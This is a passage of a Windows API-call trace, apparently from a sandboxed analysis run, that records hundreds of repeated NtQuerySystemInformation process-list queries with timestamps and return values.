ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x137d0) returned 0x0 [0097.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0097.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x138e0) returned 0x0 [0098.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x139e8) returned 0x0 [0098.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, 